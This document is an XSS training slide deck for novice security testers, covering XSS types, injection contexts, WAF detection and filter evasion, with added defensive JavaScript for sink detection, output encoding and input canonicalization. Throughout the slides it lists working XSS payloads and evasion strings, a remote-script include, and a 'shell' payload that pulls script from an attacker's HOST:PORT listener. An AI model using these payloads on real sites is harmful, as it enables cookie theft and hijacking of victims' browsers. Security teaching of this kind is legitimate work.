This document provides an introduction to cross-site scripting (XSS) attacks over the course of one hour. It defines XSS and its different types (reflected, stored, DOM), discusses common injection points and payloads, and techniques for bypassing filters including encoding, evasion tricks, and tools. The goal is to teach novices the basics needed to find and exploit XSS vulnerabilities, with tips on contexts, detection, encoding, and actual attack vectors like cookie stealing.
2. Who and Why
• Student & Junior Security Consultant.
• XSS is an easy win if you do it correctly.
• Bug bounties pay well and clients give you respect.
• Cross-site scripting is one of the oldest web application attacks known; it dates to around 1996-1998.
3. What is XSS?
Untrusted data from the user is processed by the application without any sort of validation or encoding.
The impact is on the client side, but the vulnerability resides on the server side (DOM XSS, covered later, is the exception: there the flaw is in the page's own client-side JavaScript).
Different types: Reflected, Stored and DOM XSS.
5. Reflected XSS
<?php
echo '<h1>Hello ' . $_GET["name"]. '</h1>';
What is wrong with the above code?
The above code just prints the name retrieved from the $_GET variable, without any encoding.
Malicious JavaScript can be added to the original URL and is reflected straight back into the page.
6. Some Beginner Tips
XSS can come from anywhere. Some common sources are:
URL parameters
Headers, e.g. User-Agent
Metadata
Input forms
Text areas
Hidden fields
Flash parameters
File uploads
7. Some Beginner Tips
1. Try injecting HTML tags as well as malicious JavaScript.
2. SVG is always good for a short and crisp attack vector. You can add whitespace, forward slashes and unclosed tags.
3. Add junk data with your payload.
4. Always try a couple of different payloads. This mainly applies when trying to evade filters.
"><svg/onload=prompt(1)>
8. Stored XSS
The malicious payload is stored by the server (in a database or another form of storage) and is reflected back to whoever views it.
This form of attack is easier than phishing with XSS payloads.
Depending on the attack vector, it can get admin cookies as well as access to the internal network.
9. DOM XSS
The Document Object Model is a structured representation of the web page rendered by the browser.
The DOM is where event handlers and any other JavaScript functions execute. It shows all the JavaScript and HTML rendered by your browser.
The DOM defines the way a web page is accessed and manipulated.
An attacker can manipulate the DOM by adding malicious JavaScript, which can change elements set by the DOM to attack a victim.
10. DOM XSS
To find DOM XSS, analyse the JavaScript being executed on the page and see whether the DOM is being written to.
The DOM is not "view source". Inspect element is a better visual representation of the DOM.
ZAP, Burp and other proxies do pick up unsafe methods, but you will need to check manually.
If it does not appear to be exploitable, try figuring out which library and unsafe sink the application is using, e.g. jQuery .attr().
11. DOM XSS
Common methods (sources) used to read attacker-controlled data from the DOM:
document.location
document.URL
document.URLUnencoded
document.referrer
window.location
The passed data can then be written by sinks such as eval, document.write and window.setInterval.
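The source-to-sink pairing above is what a reviewer looks for in page scripts. As an added example that is not part of the original slides, here is a small line-oriented checker that taints identifiers assigned from the listed sources and reports every line where a tainted value (or a source itself) reaches a listed sink; it goes slightly beyond the slide by also treating location.hash/location.search as sources and innerHTML, insertAdjacentHTML and jQuery .html()/.attr() as sinks. The sample script and all function names are constructed for this example.

```javascript
// Heuristic only: one statement per line, no string-literal awareness; review hits by hand.
const DOM_SOURCES = [
  'document.location', 'document.URL', 'document.URLUnencoded', 'document.referrer',
  'window.location', 'location.hash', 'location.search',
];

const DOM_SINKS = [
  { name: 'eval',                   re: /\beval\s*\(/ },
  { name: 'document.write',         re: /\bdocument\.write(?:ln)?\s*\(/ },
  { name: 'setInterval/setTimeout', re: /\bset(?:Interval|Timeout)\s*\(/ },
  { name: 'innerHTML/outerHTML',    re: /\.(?:inner|outer)HTML\s*=(?!=)/ },
  { name: 'insertAdjacentHTML',     re: /\.insertAdjacentHTML\s*\(/ },
  { name: 'jQuery .html()/.attr()', re: /\.(?:html|attr)\s*\(/ },
];

function escapeRe(s) { return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); }

// Returns { tainted: [identifiers], findings: [{ line, sink, via }] } for a script source.
function analyzeDomFlows(source) {
  const tainted = new Set();
  const findings = [];
  // The source string or tainted identifier mentioned in `text`, or null.
  const mentions = (text) => {
    const src = DOM_SOURCES.find((s) => text.includes(s));
    if (src) return src;
    for (const id of tainted) {
      if (new RegExp('\\b' + escapeRe(id) + '\\b').test(text)) return id;
    }
    return null;
  };
  source.split('\n').forEach((raw, i) => {
    const line = raw.replace(/\/\/.*$/, ''); // drop trailing // comments
    // Propagate taint through simple assignments: `var x = <expr>` or `x = <expr>`.
    const asg = /^\s*(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=(?!=)\s*(.*)$/.exec(line);
    if (asg && mentions(asg[2])) tainted.add(asg[1]);
    for (const sink of DOM_SINKS) {
      const m = sink.re.exec(line);
      if (!m) continue;
      const via = mentions(line.slice(m.index + m[0].length));
      if (via) findings.push({ line: i + 1, sink: sink.name, via });
    }
  });
  return { tainted: [...tainted], findings };
}

// Constructed sample page script mixing unsafe writes with a safe textContent write.
const SAMPLE_SCRIPT = `
// constructed sample: reads the URL fragment and referrer, writes them in several ways
var hash = document.location.hash.slice(1);
var name = decodeURIComponent(hash);
var greeting = "Hello " + name;
document.getElementById("out").innerHTML = greeting;
setInterval("updateClock(" + name + ")", 1000);
document.getElementById("safe").textContent = name;
var ref = document.referrer;
document.write("<a href='" + ref + "'>back</a>");
$("#link").attr("href", location.hash.substring(1));
var count = 0;
eval("count = " + count);
`;

// Human-readable report lines, e.g. "line 6: greeting -> innerHTML/outerHTML".
function report(source) {
  return analyzeDomFlows(source).findings.map((f) => `line ${f.line}: ${f.via} -> ${f.sink}`);
}

console.log(report(SAMPLE_SCRIPT).join('\n'));
```

The textContent write on line 8 and the untainted eval on line 13 are deliberately not reported, which is the difference between a sink and a sink fed by a source.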
12. Useful sources
OWASP DOM XSS Prevention Cheat Sheet – gives a good explanation of the unsafe methods that directly modify the DOM.
The DOM XSS wiki: https://code.google.com/p/domxsswiki/wiki/Introduction
The wiki has useful information on dangerous methods, common sources and sinks.
Other variations include Mutation XSS. More on that later.
13. Context is Everything
Context is where the given input is reflected back.
Five common ones
1. HTML
2. Attributes
3. Script
4. URL
5. Style
14. HTML Context
Malicious input is reflected back in the HTML body, inside tags such as <div>, <p>, <title> and more.
Easiest to attack.
Close the tag and try <script>alert(1)</script> or any similar payload.
15. Attribute Context
HTML elements can have attributes, and here the input is reflected inside an attribute value. So look for input being reflected back in 'value=' or 'alt=' or something similar.
Most of the time, attributes will be inside single or double quotes.
16. Couple of tips
1. Break out of the context by closing the quote and the attribute/tag, e.g. '>
2. No type of encoding will help your payload if you can't break out of the context.
3. If in doubt, URL-encode any special characters that have significance: & = + ; and space.
4. Event handlers can also be used to attack attributes: aas' onload='prompt(0);''
17. Script Context
The input is reflected back inside a script tag, usually as part of a variable. Break out of the string with quotes and execute.
Payload example:
junk' ; alert(1);//
18. URL Context
The input is reflected back in an href attribute (or another URL-bearing attribute), e.g.
<iframe src="[Reflected Data]">
<a href="[Reflected Data]">Link</a>
<META http-equiv="refresh" content="[Reflected Data]">
No need to break out of the context; you only need to encode the payload. This type of context requires the victim to click the URL to execute.
19. Tips
Common ways to attack the URL context:
javascript:prompt(0)
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
The second payload is base64 encoded (it decodes to <script>alert(1)</script>). More about encoding later.
You can also define the charset in the data: URL, just like the media type; this might be useful in some cases.
20. CSS Context
Also known as style context.
Input is usually reflected inside a style tag or attribute.
Can be attacked using CSS expressions (supported only by older Internet Explorer). A common one:
width:expression(alert('XSS'))
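The five contexts above (and the slide 5 echo) each need a different output encoding. As an added example that is not part of the original slides, the encoders below follow the OWASP XSS prevention rules for the HTML body, attribute, script-string, URL and style contexts and render one untrusted value at each of the slides' reflection points, so that the context-specific payloads shown above become inert text; the function and element names are this example's own.

```javascript
function hexEntity(c) { return '&#x' + c.charCodeAt(0).toString(16).toUpperCase() + ';'; }

// 1. HTML body context (<h1>Hello ...</h1>): entity-encode the six significant characters.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// 2. Attribute context (value="..."): encode everything non-alphanumeric, so neither quote
//    style nor a space can end the attribute and start an onload= handler.
function encodeAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, hexEntity);
}

// 3. Script context (var name = '...'): \xHH / \uHHHH escapes keep the value inside the
//    string literal, so junk' ; alert(1);// cannot terminate it.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? '\\x' + code.toString(16).padStart(2, '0')
                        : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// 4. URL context (href="..."): encoding alone is not enough, because javascript: and data:
//    URLs are perfectly valid attribute values. Allow only http(s) or scheme-less (relative)
//    URLs, after removing the control characters browsers ignore inside a scheme, then
//    attribute-encode the result.
function safeHref(s) {
  const v = String(s).replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '').replace(/[\t\n\r]/g, '');
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(v);
  if (scheme && !/^https?$/i.test(scheme[1])) return '#'; // javascript:, data:, vbscript: ...
  return encodeAttr(v);
}

// 5. Style context (style="width:..."): CSS-escape non-alphanumerics as \HH followed by a
//    space, so expression( and url( cannot be assembled from the input.
function encodeCss(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => '\\' + c.charCodeAt(0).toString(16).toUpperCase() + ' ');
}

// Render the same untrusted value at all five reflection points with the matching encoder.
function renderSafe(input) {
  return {
    html:   `<h1>Hello ${encodeHtml(input)}</h1>`,
    attr:   `<input value="${encodeAttr(input)}">`,
    script: `<script>var name = '${encodeJsString(input)}';</script>`,
    url:    `<a href="${safeHref(input)}">Link</a>`,
    style:  `<div style="width:${encodeCss(input)}"></div>`,
  };
}

console.log(renderSafe('"><svg/onload=prompt(1)>'));
```

Note that the URL encoder rejects rather than encodes: a javascript: URL survives any amount of entity encoding because the browser decodes the attribute before following it.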
21. WAF Detection
Usually regex-, blacklist- or whitelist-based.
A WAF can sometimes inspect inbound as well as outbound traffic.
Most WAFs still detect using a signature-based approach.
Common ways to detect a WAF: modified cookies, rewritten headers and distinctive response codes.
22. WAF Detection
Find combinations of allowed and blocked characters first, e.g. with a probe string such as:
xss,<>{};"'script
Some known tools to detect a WAF:
• Wafw00f
• http-waf-fingerprint NSE script
• http-waf-detect NSE script
These will only detect the popular ones.
23. Filter Evasion 101
More than one way to skin a web app!
If the <script> tag is blocked, try variations:
"><script >alert(document.cookie)</script >
"><ScRiPt>alert(document.cookie)</ScRiPt>
"%3e%3cscript%3ealert(document.cookie)%3c/script%3e
"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%00"><script>alert(document.cookie)</script>
If the site is filtering double and single quotes, you can use the backtick (`). This technique only works on IE.
24. Filter Evasion
Some popular techniques involve spaces, encoding and comments. Try using prompt or confirm instead of alert.
If brackets and quotes are blocked, call an external JavaScript file from the src attribute of a script tag:
<SCRIPT SRC=https://web.archive.org/web/20150121175718/http://ha.ckers.org/xss.js></SCRIPT>
If the application is filtering quotes or blocking script tags, try the below:
<img/src=x onerror=prompt(/XSS/);>
25. Filter Evasion
When in doubt, try to comment out everything after your payload:
<script>alert(1)</script><!--   (html/attribute context)
";alert(5);//   (script context)
If the less-than and greater-than signs are filtered in an attribute context, try:
" onload="prompt(0);""
If script and src tags are blocked in an HTML context, try:
<object data="javascript:alert(0)">
26. Filter Evasion resources
Too many techniques to present. Check them out here:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
http://codev587.net/xss-filter-evasion-cheat-sheet-no1.html
http://n0p.net/penguicon/php_app_sec/mirror/xss.html
27. Encoding
Encoding – transforming data from one format to another, e.g. ASCII, Unicode, URL encoding etc.
Browsers support numerous encoding schemes, but the attack vector depends on the page and its meta tag (charset declaration).
Encoding is useful if the server is decoding correctly. You still need to break out of the context correctly for the encoded payload to work.
<svg/onload=alert()>>
28. Encoding
The following table describes how a user can obfuscate an IP address:
URL                            Form
http://127.0.0.1/              Decimal
http://2130706433/             Dword
http://0x7f.0x00.0x00.0x01/    Hex
http://0177.0000.0000.0001/    Octal
http://127.0x00.0000.0x01/     Mixed
This trick is getting more common among phishers, e.g.
http://0xd2.0xdb.0xf1.0x7b/.online/BankofAmericaOnlineID/SignIn
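Blocklists and user-facing link previews that compare the raw host string miss every row of the table above. As an added example that is not part of the original slides, the code below applies the inet_aton rules (dword, hex, octal, mixed, and the short 127.1-style forms) to bring any numeric host back to dotted-quad before comparison; WHATWG-compliant URL parsers such as Node's URL class apply the same rules, and the manual version just makes them explicit. Function names are this example's own.

```javascript
// Parse one dot-separated part the way inet_aton and browsers do.
function parseIpv4Part(p) {
  if (/^0x[0-9a-f]+$/i.test(p)) return parseInt(p.slice(2), 16); // hex
  if (/^0[0-7]+$/.test(p)) return parseInt(p, 8);                 // leading 0 => octal
  if (/^[0-9]+$/.test(p)) return parseInt(p, 10);                 // decimal
  return NaN;                                                     // not numeric => a hostname
}

// Returns "a.b.c.d" for any numeric host form, or null when the host is not a numeric IPv4.
function normalizeIpv4Host(host) {
  const parts = host.split('.').map(parseIpv4Part);
  if (parts.length > 4 || parts.some(Number.isNaN)) return null;
  const last = parts.pop();                 // the last part fills all remaining bytes
  const tailBits = 8 * (4 - parts.length);  // 32 for a dword, 24 for "127.1", 8 for a.b.c.d
  if (parts.some((p) => p > 255) || last >= 2 ** tailBits) return null;
  let n = 0;
  for (const p of parts) n = n * 256 + p;
  n = n * 2 ** tailBits + last;
  return [n >>> 24, (n >>> 16) & 255, (n >>> 8) & 255, n & 255].join('.');
}

// Rewrite the host of a URL to dotted-quad when it is a disguised IPv4 address.
function normalizeUrlHost(url) {
  const m = /^([a-z][a-z0-9+.-]*:\/\/)([^/:?#]+)(.*)$/i.exec(url);
  if (!m) return url;
  const dotted = normalizeIpv4Host(m[2]);
  return dotted ? m[1] + dotted + m[3] : url;
}

// The phishing-style URL from the slide, normalised for display or blocklist lookup.
console.log(normalizeUrlHost('http://0xd2.0xdb.0xf1.0x7b/.online/BankofAmericaOnlineID/SignIn'));
```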
29. Encoding
The fromCharCode() method converts Unicode values into characters:
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Long UTF-8 Unicode encoding (zero-padded numeric character references) to bypass filters (entity digits reconstructed from the slide's garbled text):
<img src=x onerror="java&#0000115cript&#0000058alert(&#0000039XSS&#0000039)">
30. Encoding
Encoding can also be useful to break up an XSS payload if the server is using pattern-matching regex.
You can also double-encode payloads; whether that works depends on how the application processes encoded client requests.
The hexadecimal (URL) encoding of "../" is "%2E%2E%2f"
The double encoding of "../" is "%252E%252E%252F"
<IMG SRC="jav	ascript:alert('XSS');">
31. More Filter Evasion
ASCII decimal encoded (HTML entities; entity positions reconstructed from the slide's garbled text):
javascr&#105;pt:alert&#40;'XSS')
The entities are decoded and rendered by the browser, so the payload turns into javascript:alert('XSS').
ASCII hex encoded:
javascrip&#x74;:alert(&#x27;XSS')
Useful for bypassing 'magic_quotes_gpc'.
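Slides 27-31 all make the same point from the defender's side: a filter that matches the raw input never sees what the browser sees. As an added example that is not part of the original slides, the code below canonicalizes a value the way the browser effectively will (bounded repeated URL-decoding, numeric character references with or without semicolons, the ignored tab/newline characters) and shows every encoded form from these slides collapsing to the same plain payload; output encoding by context remains the real fix, and the probe strings and function names here are constructed for the example.

```javascript
function decodeUrlFully(s, maxRounds = 3) {
  // Decode repeatedly (bounded) so %252E -> %2E -> "."; stop once the value is stable.
  let prev = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(prev); } catch { break; } // malformed %-sequence: stop
    if (next === prev) break;
    prev = next;
  }
  return prev;
}

function decodeNumericEntities(s) {
  // &#115; &#0000115 &#x73; &#X73 with or without the trailing semicolon: HTML parsers
  // decode all of these as numeric character references inside attribute values.
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, num) => {
    const code = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return code > 0 && code <= 0x10ffff ? String.fromCodePoint(code) : '';
  });
}

function stripIgnoredControls(s) {
  // Tab, LF and CR are ignored inside a URL scheme, so "jav<TAB>ascript:" still runs;
  // NUL is dropped by many parsers as well.
  return s.replace(/[\t\n\r\0]/g, '');
}

// What the browser will act on, for a value that reaches a URL or event-handler attribute.
function canonicalize(s) {
  return stripIgnoredControls(decodeNumericEntities(decodeUrlFully(String(s)))).trim();
}

// True when the canonical form starts with a scheme that executes script or injects markup.
function hasScriptScheme(s) {
  return /^(javascript|vbscript|data)\s*:/i.test(canonicalize(s));
}

// Constructed probes modelled on the encoding slides; all canonicalize to the same payload.
const ENCODED_FORMS = [
  'java&#0000115cript&#0000058alert(&#0000039XSS&#0000039)', // zero-padded decimal refs
  "javascr&#105;pt:alert&#40;'XSS')",                         // decimal refs
  "javascrip&#x74;:alert(&#x27;XSS')",                        // hex refs
  "jav\tascript:alert('XSS')",                                // tab inside the scheme
  '%6A%61vascript:alert(&#39;XSS&#39;)',                      // URL-encoded + entities
];

for (const form of ENCODED_FORMS) {
  console.log(JSON.stringify(form), '->', canonicalize(form), hasScriptScheme(form));
}
```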
34. Useful tools
Opinion: most scanners suck at finding XSS.
A couple of tools I like – Xenotix, the XSSValidator Burp plugin, Sleepy Puppy (useful if testing multiple applications; it has trackable XSS payloads).
How to build a scanner that works?
A - Scan within a browser engine.
B - Use PhantomJS or a similar WebKit-based headless browser to detect successful reflected XSS.
I still prefer finding XSS manually, but I like having options.
35. XSS Shell Demo
Cool PoC by Brutelogic. A more fun way to report XSS than just a script alert(1).
Attacker machine listener
Target payload:
<svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
36. Things I didn't mention
Flash XSS – Embedded SWF files can be decompiled to source code. This can be used to find unfiltered variables which can be called from a URL to include malicious XSS.
XSS Polyglot – Upload a Flash file that is also accepted as valid JavaScript. Run remote XSS with an src tag (can beat CSP in rare cases).
Mutation XSS – There are more ways to trick the DOM into parsing malicious XHTML-like payloads.
All worth checking out.